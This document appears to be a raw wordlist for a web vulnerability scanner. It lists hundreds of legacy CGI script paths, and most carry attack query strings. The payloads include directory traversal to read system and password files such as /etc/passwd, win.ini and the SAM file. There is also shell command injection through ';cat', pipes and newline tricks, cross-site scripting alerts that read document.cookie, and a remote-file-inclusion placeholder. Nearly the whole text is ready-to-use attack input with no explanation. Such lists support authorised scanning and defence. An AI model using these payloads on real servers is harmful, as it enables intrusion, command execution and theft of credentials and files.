zsh
wwwwais
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00
wwwthreads/w3tvars.pm
wwwthreads/3tvars.pm
wwwstats.pl
wwwboard.pl
wwwadmin.pl
wwwboard.cgi.cgi
www-sql
ws_ftp.ini
wrap.cgi
wrap
windmail
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
windmail.exe
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
whois.cgi?action=load&whois=%3Bid
where.pl?sd=ls%20/etc
wguest.exe
webwho.pl
webutils.pl
webutil.pl
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}
websendmail
webplus?script=../../../../../../../../../..{KNOWNFILE}
webplus?about
webplus.exe?about
webnews.pl
webmap.cgi
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
webgais
webif.cgi
webfind.exe?keywords=01234567890123456789
webdriver
webdist.cgi?distloc=;cat%20{KNOWNFILE}
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}
webbbs.exe
webbbs.cgi
webais
wconsole.dll
way-board/way-board.cgi?db={KNOWNFILE}%00
way-board.cgi?db={KNOWNFILE}%00
wais.pl
w3-sql
w3-msql
vq/demos/respond.pl?<script>alert('XSS')</script>
vpasswd.cgi
vote.cgi
visitor.exe
visadmin.exe
virgil.cgi
viralator.cgi
viewsource?{KNOWNFILE}
viewlogs.pl
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00
view-source?view-source
view-source
utm/utm_stat
utm/admin
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}
urlcount.cgi?%3CIMG%20
uptime
upload.cgi
update.dpgs
unlg1.1
unlg1.2
ultraboard.pl
ultraboard.cgi
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
troops.cgi
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}
tpgnrock
title.cgi
tigvote.cgi
tidfinder.cgi
textcounter.pl
texis/phine
texis/junk
texis.exe/junk
testcgi.exe?<script>alert(document.cookie)</script>
testcgi.exe
testcgi.exe
test/test.cgi
test.cgi
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
test-env
test-cgi?/*
test-cgi.tcl
test-cgi.exe?<script>alert(document.cookie)</script>
test-cgi.bat
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}
tcsh
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1
tablebuild.pl
sws/manager.pl
sws/admin.html
survey.cgi
survey
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
store/index.cgi?page=../../../../../../../..{KNOWNFILE}
store/agora.cgi?page=whatever33.html
store/agora.cgi?cart_id=<script>alert('XSS')</script>
store.cgi?
statview.pl
statusconfig.pl
statsconfig
stats_old/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats/
stats.prf
stats.pl
stats-bin-p/reports/index.html
stat/
stat.pl
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}
sscd_suncourier.pl
ss
spin_client.cgi?aaaaaaaa
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
simplestmail.cgi
simplestguest.cgi
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|
shtml.dll
showuser.cgi
showcheckins.cgi?person=<script>alert('XSS')</script>
show.pl
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}
shop/orders/orders.txt
shop/auth_data/auth_user_file.txt
shop.pl/page=;cat%20shop.pl|
shop.cgi?page=../../../../../../..{KNOWNFILE}
sh
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}
session/adminlogin
sensepost.exe?/c+dir
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
sendform.cgi
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
search.pl
search.php?searchstring=<script>alert(document.cookie)</script>
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
scripts/*%0a.pl
scoadminreg.cgi
sbcgi/sitebuilder.cgi
sawmill?rfcf+%22
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1
rwwwshell.pl
rwcgi60/showenv
rwcgi60
rtm.log
rsh
rpm_query
robpoll.cgi
robadmin.cgi
rmp_query
rksh
rightfax/fuwww.dll/?
rguest.exe
retrieve_password.pl
responder.cgi
replicator/webpage.cgi/
register.cgi
redirect
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
ratlog.cgi
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
quizme.cgi
quikstore.cfg
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=
query?mss=%2e%2e/config
query
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10
probecontrol.cgi?command=enable&username=cancer&password=killer
pu3.pl
profile.cgi
processit.pl
printenv.tmp
printenv
ppdscgi.exe
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
postcards.cgi
post_query
post32.exe|dir%20c:\\
post16.exe
post-query
pollssi.cgi
pollit/Poll_It_
plusmail
php.cgi?{KNOWNFILE}
php-cgi
photo/protected/manage.cgi
photo/manage.cgi
photo/
phf?Qname=root%0Acat%20{KNOWNFILE}%20
phf.cgi?QALIA
phf
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
perlshop.cgi
perl?-v
perl.exe?-v
perl.exe
perl
pbcgi.cgi?name=Joe%Camel&email=%3C
password
passwd.txt
passwd
pass
parse-file
pals-cgi?palsAction=restart&documentName={KNOWNFILE}
pagelog.cgi
orders/orders.txt
opendir.php?{KNOWNFILE}
ntitar.pl
nph-test-cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-publish.cgi
nph-publish
nph-maillist.pl
nph-exploitscanget.cgi
nph-error.pl
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
noshell
non-existent.pl
nlog-smb.pl
nlog-smb.cgi
nimages.php
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}
netpad.cgi
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}
nbmember.cgi?cmd=list_all_users
namazu.cgi
myguestbook.cgi?action=view
musicqueue.cgi
multihtml.pl?multi={KNOWNFILE}%00html
mt/mt.cfg
mt/mt-load.cgi
mt/mt-check.cgi
mt/
mt-static/mt.cfg
mt-static/mt-load.cgi
mt-static/mt-check.cgi
mt-static/
ms_proxy_auth_query/
mrtg.cgi?cfg=blah
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}
mojo/mojo.cgi
moin.cgi?test
mmstdod.cgi
mkplog.exe
mkilog.exe
minimal.exe
mini_logger.cgi
mgrqcgi
meta.pl
mastergate/search.cgi?search=0&search_on=all
man2html
majordomo.pl
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}
mailnews.cgi
maillist.pl
maillist.cgi
mailit.pl
mailform.exe
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
mail
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..{KNOWNFILE}
lwgate.cgi
lwgate
ls
lookwho.cgi
logs/error_log
logs/access_log
logs/
logs.pl
logit.cgi
login.pl?course_id=\
login.pl
login.cgi
log/nether-log.pl?checkit
log/
log-reader.cgi
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}
listrec.pl
lastlines.cgi?process
ksh
journal.cgi?folder=journal.cgi%00
jj
jailshell
ion-p?page=../../../../..{KNOWNFILE}
ion-p.exe?page=c:\winnt\repair\sam
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
input2.bat?|dir
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
infosrch.cgi
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}>
info2www
index.pl
index.js0x70
include/new-visitor.inc.php
imagemap.exe
imagemap
imagefolio/admin/admin.cgi
imageFolio.cgi
ikonboard/help.cgi?
if/admin/nph-build.cgi
icat
ibill.pm
htsearch?exclude=%60{KNOWNFILE}%60
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch?-c/nonexistant
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
htmlscript?../../../../../../../../../..{KNOWNFILE}
html2wml.cgi
html2chtml.cgi
htimage.exe/path/filename?2,2
htimage.exe
htgrep?file=index.html&hdr={KNOWNFILE}
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00
hpnst.exe?c=p+i=
horde/test.php?mode=phpinfo
horde/test.php
hitview.cgi
hello.bat?&dir+c:\\
handler.cgi
guestbook/passwd
guestbook.pl
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|
guestbook.cgi
gm.cgi
gm-cplog.cgi
gm-authors.cgi
glimpse
gettransbitmap
getdoc.cgi
get32.exe
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
gbpass.pl
gbook/gbook.cgi?_MAILTO=xx;ls
gbadmin.cgi?action=setup
gbadmin.cgi?action=colors
gbadmin.cgi?action=change_automail
gbadmin.cgi?action=change_adminpass
gH.cgi
ftpsh
ftp.pl
fpsrvadm.exe
foxweb.exe
foxweb.dll
fortune
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
formmail.pl
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
formmail.cgi
formmail
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
fom.cgi?file=<script>alert('XSS')</script>
flexform.cgi
flexform
finger.pl
finger
filemail.pl
filemail
faxsurvey?cat%20{KNOWNFILE}
faqmanager.cgi?toc={KNOWNFILE}%00
ezshopper3/loadpage.cgi
ezshopper2/loadpage.cgi
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|
ezman.cgi
ezboard.cgi
ezadmin.cgi
excite;IF
excite
ex-logger.pl
eshop.pl/seite=;cat%20eshop.pl|
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
environ.pl?param1=<script>alert(document.cookie)</script>
environ.pl
environ.cgi
enter.cgi
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
empower?DB=whateverwhatever
edit.pl
echo.bat?&dir+c:\\
echo.bat
dumpenv.pl
download.cgi
dose.pl?daily&somefile.txt&|ls|
donothing
dnewsweb
displayTC.pl
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00
dig.cgi
diagnose.cgi
dfire.cgi
dcshop/orders/orders.txt
dcshop/auth_data/auth_user_file.txt
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00
dbmlparser.exe
dbman/db.cgi?db=no-db
db_manager.cgi
db4web_c/dbdirname/{KNOWNFILE}
db2www/library/document.d2w/show
day5datanotifier.cgi
day5datacopier.cgi
date
data/fetch.php?page=
dasp/fm_shell.asp
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvslog.cgi?file=<script>alert('XSS')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cvsblame.cgi?file=<script>alert('XSS')</script>
cutecast/members/
cstat.pl
csh
csPassword/csPassword.cgi
csPassword.cgi
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csNews.cgi
csLive
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
cs
counterfiglet/nc/
counterfiglet-ord
counterbanner-ord
counterbanner
counter-ord
count.cgi
compatible.cgi
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
common/listrec.pl
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html
commandit.cgi
com5.pl
com5.java
com5..........................................................................................................................................................................................................................box
code.php3
code.php
cmd1.exe?/c+dir
cmd.exe?/c+dir
clickresponder.pl
clickcount.pl?view=test
classifieds/index.cgi
classifieds/classifieds.cgi
classifieds.cgi
classifieds
classified.cgi
change-your-password.pl
cgiwrap/~root
cgiwrap/~JUNK(5)
cgiwrap/~@U
cgiwrap/%3Cfont%20color=red%3E
cgiwrap
cgitest.exe
cgimail.exe
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00
cgicso?query=AAA
cgicso?query=<script>alert('XSS')</script>
cgi-lib.pl
cgforum.cgi
cfgwiz.exe
ccbill-local.pl?cmd=MENU
ccbill-local.cgi?cmd=MENU
cbmc/forums.cgi
cartmanager.cgi
cart32.exe
cart.pl?db='
cart.pl
campas?%0acat%0a{KNOWNFILE}%0a
calender_admin.pl
calendar_admin.pl?config=|cat%20{KNOWNFILE}|
calendar/index.cgi
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|
calendar.pl
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00
cachemgr.cgi
cached_feed.cgi
c_download.cgi
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
c32web.exe/ChangeAdminPassword
bulk/bulk.cgi
build.cgi
bslist.cgi?email=x;ls
bsguest.cgi?email=x;ls
boozt/admin/index.cgi?section=5&input=1
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10
bnbform.cgi
bnbform
blog/mt.cfg
blog/mt-load.cgi
blog/mt-check.cgi
blog/
bizdb1-search.cgi
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=
betsie/parserl.pl/<script>alert('XSS')</script>;
bbs_forum.cgi
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bb-hist?HI
bash
bannereditor.cgi
banner.cgi
badmin.cgi
axs.cgi
ax.cgi
ax-admin.cgi
awstats/awstats.pl
awstats.pl
awl/auctionweaver.pl
auth_data/auth_user_file.txt
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}
auctiondeluxe/auction.pl
auction/auction.cgi?action=
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
astrocam.cgi
ash
architext_query.pl
architext_query.cgi
archie
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
anyboard.cgi
ans/ans.pl?p=../../../../../usr/bin/id|&blah
ans.pl?p=../../../../../usr/bin/id|&blah
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}
amadmin.pl
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
aglimpse.cgi
aglimpse
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
adminwww.cgi
adminhot.cgi
admin.pl
admin.php3
admin.php
admin.cgi
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}
adduser.cgi
addbanner.cgi
add_ftp.cgi
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00
Webnews.exe
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
WINDMAIL.EXE?%20-n%20c:\boot.ini%
Vs
W
Upload.pl
Pbcgi.exe
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
MsmMask.exe
LWGate.cgi
LWGate
ImageFolio/admin/admin.cgi
GWWEB.EXE?HELP=bad-request
GW5/GWWEB.EXE?HELP=bad-request
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE
FormMail.pl
FormMail.cgi?<script>alert(\
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
File
DCFORM
DC
Count.cgi
Cgitest.exe
C
Backup/add-passwd.cgi
AnyForm2
AnyForm
AnyBoard.cgi
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AT-generate.cgi
AT-admin.cgi
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
/_vti_pvt/doctodep.btr
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
.wwwacl
.www_acl
.passwd
.nsconfig
.htpasswd
.htaccess~
.htaccess.save
.htaccess.old
.htaccess
.fhp
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
.cobalt
.access
../../../../../../../../../../WINNT/system32/ipconfig.exe
%2e%2e/abyss.conf
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)